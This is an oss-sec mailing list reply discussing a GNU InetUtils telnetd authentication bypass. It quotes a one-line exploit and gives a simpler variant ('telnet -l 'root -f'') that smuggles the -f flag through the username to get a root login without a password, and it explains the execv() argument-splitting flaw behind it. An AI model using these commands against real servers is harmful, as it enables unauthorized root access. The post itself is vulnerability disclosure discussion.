oss-sec mailing list archives
Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
From: Paul Ducklin <pducklin () outlook com>
Date: Wed, 28 Jan 2026 20:57:46 +0000
USER='-f root' telnet -a localhost
Seems that the same code path results from the even simpler incantation: $ telnet -l 'root -f' server.test The user-name-with-a-space-in-it doesn't get passed as a single argument to execv(), but "helpfully" gets split back into two parts and passed to execv() as two separate entries in argv[] :-) Q. "Hey, if we call execv() directly, we'll avoid some of the risks associated with shell-style command line processing. How good is that?" A. "Hold my beer." TELNET, eh? From the days when RFCs still had just three digits...
Current thread:
- GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Simon Josefsson (Jan 20)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Alexander Bochmann (Jan 20)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Jakub Wilk (Jan 21)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Christian Fischer (Jan 22)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Demi Marie Obenour (Jan 22)
- <Possible follow-ups>
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Paul Ducklin (Jan 28)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Alexander Bochmann (Jan 20)